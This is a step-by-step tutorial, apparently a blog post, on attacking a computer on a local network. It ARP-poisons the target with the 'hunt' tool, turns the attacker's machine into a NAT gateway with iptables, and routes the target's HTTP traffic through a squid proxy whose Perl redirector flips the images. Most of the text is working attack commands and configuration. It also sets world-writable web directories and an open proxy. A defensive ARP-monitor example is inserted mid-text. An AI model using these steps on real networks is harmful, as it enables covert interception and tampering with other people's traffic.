This is what we want to do:
- Make the target send all http packets to us instead of the gateway
- Forward them to the real gateway
- Modify the reply, with the pictures upside-down
- Forward the reply to the target
And this is how we do it:
- Poison the ARP table of the target
- Set up our pc as a gateway router
- Send all http requests through a squid proxy
- Turn images upside-down with a squid script
Ok, sounds great, let's get started!
1. Poison the ARP table of the target
We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we want to send a packet to 10.0.0.1, an ARP request is sent out on the local LAN, saying "Which computer is at 10.0.0.1?", then 10.0.0.1 answers with an ARP reply "I am at 10.0.0.1, with mac address 11:22:33:44:55:66".
Then we send the packet to 11:22:33:44:55:66. ARP replies are cached in a local ARP table, so the next time we want to send to 10.0.0.1, we don't need to ask who's got it. We are going to send a fake ARP reply to the target (10.0.0.88), saying we are at 10.0.0.1. Usually ARP replies are accepted even though no request was sent, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but I prefer to use another, a bit more powerful, tool called hunt. You can download the hunt source code here, and compile it like this:
tar zxvf hunt-1.5.tgz
cd hunt-1.5
make
Fire up hunt:
sudo ./hunt
In the menu system go to
a) daemons rst/arp/sniff/mac
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
Type in the ip of the real gateway, your mac address (find this by running ifconfig), and the target's ip.
d) start/stop relayer daemon (press s)
Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing "arp -a" on the target, and see that the gateway ip has your mac address.
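The "arp -a" check above is also what a defender on the target side can automate. This is an added example, not code from the original post: a small Python monitor that parses `arp -a` output, pins the MAC first seen for the gateway, and reports when a later snapshot claims a different MAC for it. The snapshots and MAC addresses are constructed, and the ArpMonitor class and its method names are this example's own assumptions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
# A Linux `arp -a` row looks like: "? (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0"
ARP_ROW = re.compile(
    r"\((?P<ip>\d+(?:\.\d+){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

def parse_arp_a(output: str) -> list[tuple[str, str]]:
    """Extract (ip, mac) pairs from `arp -a` output; <incomplete> rows are skipped."""
    return [(m.group("ip"), m.group("mac").lower()) for m in ARP_ROW.finditer(output)]

@dataclass
class ArpAlert:
    ip: str
    old_mac: str   # the MAC first learned for this IP (the real gateway)
    new_mac: str   # the MAC now claimed for it

@dataclass
class ArpMonitor:
    """Pins the first MAC seen for each watched IP and alerts on any change."""
    watched: set[str]                                    # e.g. {gateway_ip}
    table: dict[str, str] = field(default_factory=dict)  # ip -> pinned mac

    def observe(self, ip: str, mac: str) -> ArpAlert | None:
        """Feed one IP->MAC observation (an ARP reply or an `arp -a` row)."""
        if ip not in self.watched:
            return None
        mac = mac.lower()
        known = self.table.setdefault(ip, mac)   # first sighting becomes the pin
        if known == mac:
            return None
        return ArpAlert(ip, known, mac)          # pin is kept, change is reported

    def check_snapshot(self, arp_a_output: str) -> list[ArpAlert]:
        """Run a whole `arp -a` snapshot through observe() and collect alerts."""
        found = [self.observe(ip, mac) for ip, mac in parse_arp_a(arp_a_output)]
        return [a for a in found if a is not None]

# Constructed snapshots: in the second, the gateway IP resolves to a different MAC.
SNAPSHOT_CLEAN = """? (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0
? (10.0.0.5) at aa:bb:cc:dd:ee:01 [ether] on eth0
"""
SNAPSHOT_POISONED = """? (10.0.0.1) at de:ad:be:ef:00:02 [ether] on eth0
? (10.0.0.5) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (10.0.0.9) at <incomplete> on eth0
"""

def run_sample(gateway: str = "10.0.0.1") -> list[ArpAlert]:
    mon = ArpMonitor(watched={gateway})
    mon.check_snapshot(SNAPSHOT_CLEAN)       # learns the real gateway MAC
    return mon.check_snapshot(SNAPSHOT_POISONED)
```

In practice you would feed it the output of `arp -a` (or `ip neigh`) on a timer and treat any alert for the gateway entry as a reason to inspect the LAN.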
2. Set up our pc as a gateway router
This is easy, just run these commands:
sudo iptables -F
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Where eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded.
3. Send all http requests through a squid proxy
Install squid and reset its config:
sudo apt-get install squid
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
Edit /etc/squid/squid.conf with your favorite editor like this:
http_port 127.0.0.1:8080
http_port 10.0.0.2:8080
visible_hostname gateway.my.flat
cache_mgr proxy@foo.com
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
acl all src 0.0.0.0/0.0.0.0
http_access allow all
redirect_program /var/redirect
4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this:
#!/usr/bin/perl
# Squid redirector: reads one request line per input line, rewrites
# image URLs to a locally stored, flipped copy and passes everything
# else through unchanged.
$|=1;           # unbuffered output, squid waits for each answer
$count = 0;
$pid = $$;      # make file names unique per redirector process
while (<>) {
    chomp $_;
    if ($_ =~ /(.*\.jpg)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.jpg", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.jpg");
        system("/bin/chmod", "777", "/var/www/$pid-$count.jpg");
        print "http://127.0.0.1/$pid-$count.jpg\n";
    }
    elsif ($_ =~ /(.*\.gif)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.gif", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.gif");
        system("/bin/chmod", "777", "/var/www/$pid-$count.gif");
        print "http://127.0.0.1/$pid-$count.gif\n";
    }
    else {
        print "$_\n";   # not an image: hand the line back untouched
    }
    $count++;
}
As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache:
sudo apt-get install apache2
sudo chmod -R 777 /var/www
At last, reload squid with the new configuration:
sudo /etc/init.d/squid restart
You can test the squid by configuring your firefox to use localhost:8080 as a proxy server.
YOU HAVE NOW HACKED THE TARGET COMPUTER!
Thanks....